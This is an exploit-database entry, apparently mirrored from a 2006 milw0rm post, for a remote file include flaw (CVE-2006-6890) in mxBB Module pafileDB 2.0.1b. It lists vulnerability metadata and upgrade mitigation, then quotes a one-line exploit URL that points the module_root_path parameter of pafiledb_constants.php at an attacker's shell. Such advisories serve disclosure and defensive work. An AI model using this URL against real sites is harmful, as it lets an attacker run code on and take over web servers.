header-logo
Suggest Exploit
vendor:
mxBB Module pafileDB
by:
bd0rk || SOH-Crew
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: mxBB Module pafileDB
Affected Version From: 2.0.1b
Affected Version To: 2.0.1b
Patch Exists: YES
Related CWE: CVE-2006-6890
CPE: a:mxbb:mxbb_module_pafiledb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

mxBB Module pafileDB 2.0.1b Remote File Include Vulnerability

mxBB Module pafileDB 2.0.1b is vulnerable to a remote file include vulnerability. This vulnerability allows an attacker to include a remote file, usually resulting in a remote shell on the webserver.

Mitigation:

Upgrade to the latest version of mxBB Module pafileDB.
Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

mxBB Module pafileDB 2.0.1b Remote File Include Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=15

by bd0rk || SOH-Crew

Vulnerable Code in pafiledb_constants.php

Exploit: http://[site]/[path]/modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=[Shell]

# milw0rm.com [2006-12-26]

Navigation

Suggest Exploit

Services By CQR